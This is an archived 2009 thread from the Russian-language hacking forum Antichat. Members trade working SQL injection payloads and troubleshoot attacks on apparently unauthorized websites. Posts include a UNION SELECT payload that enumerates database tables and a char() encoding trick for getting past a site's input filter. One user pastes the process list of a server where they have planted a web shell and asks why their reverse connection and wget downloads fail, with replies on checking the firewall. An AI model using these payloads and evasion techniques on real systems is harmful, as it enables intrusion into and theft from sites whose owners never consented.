ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.11.2009, 03:13
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 20
Провел на форуме:
32270
Репутация:
0
|
|
del
Последний раз редактировалось fng; 18.11.2009 в 03:19..
|
|
|
18.11.2009, 03:26
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Что del ? =) С ссылки нужно было начинать. Обещаю, что не буду патентовать твою скулю
details.php?id=-36))+union+select+1,2,3,4,unhex(hex(table_name)),6 ,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,1 0,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema .tables--+
Add: xотя нет, сейчас я соберу хакерскую пресс-конференцию, и оглашу эту скулю всем.
Последний раз редактировалось ElteRUS; 18.11.2009 в 03:31..
|
|
|
|
18.11.2009, 04:22
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 20
Провел на форуме:
32270
Репутация:
0
|
|
просто поля подобрал потом)
кстати там почему-то limit не работает...
|
|
|
|
18.11.2009, 05:55
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
limit не будет работать только если это не mysql
|
|
|
|
18.11.2009, 06:48
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
почему, длина строки запроса может быть ограничена просто
|
|
|
|
18.11.2009, 13:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
UID PID PPID C SZ RSS PSR STIME TTY TIME CMD
root 1 0 0 929 580 2 Jun14 ? 00:00:43 init [3]
root 2 0 0 0 0 1 Jun14 ? 00:00:00 [kthreadd]
root 3 2 0 0 0 0 Jun14 ? 00:00:03 [migration/0]
root 4 2 0 0 0 0 Jun14 ? 00:00:00 [ksoftirqd/0]
root 5 2 0 0 0 0 Jun14 ? 00:00:04 [watchdog/0]
root 6 2 0 0 0 1 Jun14 ? 00:00:01 [migration/1]
root 7 2 0 0 0 1 Jun14 ? 00:00:01 [ksoftirqd/1]
root 8 2 0 0 0 1 Jun14 ? 00:00:03 [watchdog/1]
root 9 2 0 0 0 2 Jun14 ? 00:00:01 [migration/2]
root 10 2 0 0 0 2 Jun14 ? 00:00:02 [ksoftirqd/2]
root 11 2 0 0 0 2 Jun14 ? 00:00:03 [watchdog/2]
root 12 2 0 0 0 3 Jun14 ? 00:00:00 [migration/3]
root 13 2 0 0 0 3 Jun14 ? 00:00:01 [ksoftirqd/3]
root 14 2 0 0 0 3 Jun14 ? 00:00:07 [watchdog/3]
root 15 2 0 0 0 0 Jun14 ? 00:04:46 [events/0]
root 16 2 0 0 0 1 Jun14 ? 00:03:05 [events/1]
root 17 2 0 0 0 2 Jun14 ? 00:03:28 [events/2]
root 18 2 0 0 0 3 Jun14 ? 00:04:45 [events/3]
root 19 2 0 0 0 0 Jun14 ? 00:00:00 [khelper]
root 97 2 0 0 0 0 Jun14 ? 00:00:00 [kblockd/0]
root 98 2 0 0 0 1 Jun14 ? 00:00:00 [kblockd/1]
root 99 2 0 0 0 2 Jun14 ? 00:00:00 [kblockd/2]
root 100 2 0 0 0 3 Jun14 ? 00:00:01 [kblockd/3]
root 103 2 0 0 0 1 Jun14 ? 00:00:00 [kacpid]
root 104 2 0 0 0 0 Jun14 ? 00:00:00 [kacpi_notify]
root 247 2 0 0 0 0 Jun14 ? 00:00:00 [ata/0]
root 248 2 0 0 0 1 Jun14 ? 00:00:00 [ata/1]
root 249 2 0 0 0 2 Jun14 ? 00:00:00 [ata/2]
root 250 2 0 0 0 3 Jun14 ? 00:00:00 [ata/3]
root 251 2 0 0 0 2 Jun14 ? 00:00:00 [ata_aux]
root 252 2 0 0 0 0 Jun14 ? 00:00:00 [ksuspend_usbd]
root 257 2 0 0 0 3 Jun14 ? 00:00:00 [khubd]
root 260 2 0 0 0 3 Jun14 ? 00:00:00 [kseriod]
root 333 2 0 0 0 1 Jun14 ? 00:00:00 [pdflush]
root 334 2 0 0 0 3 Jun14 ? 00:26:36 [pdflush]
root 335 2 0 0 0 2 Jun14 ? 00:00:13 [kswapd0]
root 336 2 0 0 0 0 Jun14 ? 00:00:00 [aio/0]
root 337 2 0 0 0 1 Jun14 ? 00:00:00 [aio/1]
root 338 2 0 0 0 2 Jun14 ? 00:00:00 [aio/2]
root 339 2 0 0 0 3 Jun14 ? 00:00:00 [aio/3]
root 1028 2 0 0 0 0 Jun14 ? 00:00:00 [scsi_eh_0]
root 1030 2 0 0 0 1 Jun14 ? 00:00:00 [scsi_eh_1]
root 1032 2 0 0 0 3 Jun14 ? 00:00:00 [scsi_eh_2]
root 1034 2 0 0 0 3 Jun14 ? 00:00:00 [scsi_eh_3]
root 1053 2 0 0 0 0 Jun14 ? 00:00:00 [khpsbpkt]
root 1063 2 0 0 0 1 Jun14 ? 00:00:00 [knodemgrd_0]
root 1101 2 0 0 0 1 Jun14 ? 00:00:00 [kpsmoused]
root 1106 2 0 0 0 0 Jun14 ? 00:00:00 [kondemand/0]
root 1107 2 0 0 0 1 Jun14 ? 00:00:00 [kondemand/1]
root 1108 2 0 0 0 2 Jun14 ? 00:00:00 [kondemand/2]
root 1109 2 0 0 0 3 Jun14 ? 00:00:00 [kondemand/3]
root 1114 2 0 0 0 0 Jun14 ? 00:00:00 [rpciod/0]
root 1115 2 0 0 0 1 Jun14 ? 00:00:00 [rpciod/1]
root 1116 2 0 0 0 2 Jun14 ? 00:00:00 [rpciod/2]
root 1117 2 0 0 0 3 Jun14 ? 00:00:00 [rpciod/3]
root 1120 2 0 0 0 3 Jun14 ? 00:59:16 [md3_raid1]
root 1123 2 0 0 0 0 Jun14 ? 00:00:19 [md2_raid1]
root 1126 2 0 0 0 0 Jun14 ? 00:00:02 [md1_raid1]
root 1128 2 0 0 0 0 Jun14 ? 00:00:00 [reiserfs/0]
root 1129 2 0 0 0 1 Jun14 ? 00:00:00 [reiserfs/1]
root 1130 2 0 0 0 2 Jun14 ? 00:00:00 [reiserfs/2]
root 1131 2 0 0 0 3 Jun14 ? 00:00:04 [reiserfs/3]
root 1225 1 0 3111 848 3 Jun14 ? 00:00:00 /sbin/udevd --daemon
root 1584 1 0 56282 10708 1 Jun19 ? 00:12:28 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
postfix 1663 5338 0 9562 2096 1 08:44 ? 00:00:00 pickup -l -t fifo -u
root 3776 1 0 964 512 1 Jun14 ? 00:00:30 mdadm --monitor --scan --daemonise --pid-file /var/run/mdadm.pid --syslog
apache 4064 1584 0 58211 27936 3 09:39 ? 00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4115 1584 0 58229 25840 3 09:40 ? 00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4419 1584 0 57307 22596 3 09:46 ? 00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4504 1584 0 57704 25460 3 09:48 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4505 1584 0 58098 26584 0 09:48 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root 4521 1 0 3944 1484 1 Jun14 ? 00:03:02 /usr/sbin/syslog-ng
apache 4604 1584 0 57458 24192 3 09:50 ? 00:00:02 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4605 1584 0 57377 21772 3 09:50 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4689 1584 0 57456 22288 3 09:52 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4690 1584 0 57383 22400 3 09:52 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4731 1584 0 58100 24432 2 09:53 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4808 1584 0 57700 24324 3 09:55 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4811 1584 0 57693 22308 3 09:55 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4812 1584 0 58228 26288 3 09:55 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4932 1584 0 57464 20660 3 09:58 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4933 1584 0 58223 23496 3 09:58 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4973 1584 0 58163 25112 3 09:59 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4975 1584 0 57636 21560 3 09:59 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4976 1584 0 57401 23344 3 09:59 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4978 1584 0 57511 21264 3 09:59 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5037 4731 0 2522 744 3 10:00 ? 00:00:00 ping mail.ru
apache 5044 1584 0 57440 20392 3 10:00 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5045 1584 0 57367 21812 3 10:00 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root 5077 1 0 7797 1040 0 Jun14 ? 00:00:00 /usr/sbin/sshd
apache 5095 1584 0 57260 18820 1 10:01 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5181 1584 0 57322 18292 3 10:03 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5189 1584 0 57254 18496 3 10:03 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root 5239 1 0 3680 1176 1 Jun14 ? 00:02:11 /usr/sbin/ntpd -p /var/run/ntpd.pid
apache 5281 1584 0 57309 19008 3 10:05 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5321 1584 0 57318 15432 0 10:06 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5325 4505 0 3656 948 3 10:06 ? 00:00:00 ps -eF
root 5338 1 0 9549 2124 0 Jun14 ? 00:02:19 /usr/lib64/postfix/master
postfix 5360 5338 0 9576 2168 1 Jun14 ? 00:00:19 qmgr -l -t fifo -u
root 5452 1 0 4070 736 0 Jun14 ? 00:01:20 /usr/sbin/cron
root 5519 1 0 1451 680 2 Jun14 tty2 00:00:00 /sbin/agetty 38400 tty2 linux
root 5520 1 0 1451 680 2 Jun14 tty3 00:00:00 /sbin/agetty 38400 tty3 linux
root 5521 1 0 1451 680 3 Jun14 tty4 00:00:00 /sbin/agetty 38400 tty4 linux
root 5522 1 0 1451 684 1 Jun14 tty5 00:00:00 /sbin/agetty 38400 tty5 linux
root 5523 1 0 1451 680 0 Jun14 tty6 00:00:00 /sbin/agetty 38400 tty6 linux
root 29805 1 0 1451 680 2 Jun18 tty1 00:00:00 /sbin/agetty 38400 tty1 linux
apache 31617 1584 0 57632 23972 1 Aug04 ? 00:00:30 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
Какой из этих процессов является фаерволлом или антивирусом? Или по-другому вопрос задам - есть веб-шелл на сайте, ядро старое, рутаемое, но он не хочет делать бек-коннект. WGET'oм файлы тоже не скачивает, хотя which wget показывает, что WGET есть. Вывод - фаерволл блокирует исходящие соединения? Или нет? |
|
|
|
18.11.2009, 14:05
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
из этих никакой
|
|
|
|
18.11.2009, 14:06
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:
PHP код:
http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм
Можно как-то в СИПТ исправить разделители? |
|
|
|
18.11.2009, 14:22
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Byrger
Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:
PHP код:
http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм
Можно как-то в СИПТ исправить разделители? char(120,115,113,108,105,110,106,98,101,103,105,11 0)
|
|
|
|
18.11.2009, 14:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
mailbrush, что показывает
Код:
/sbin/lsmod | grep ipt
? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
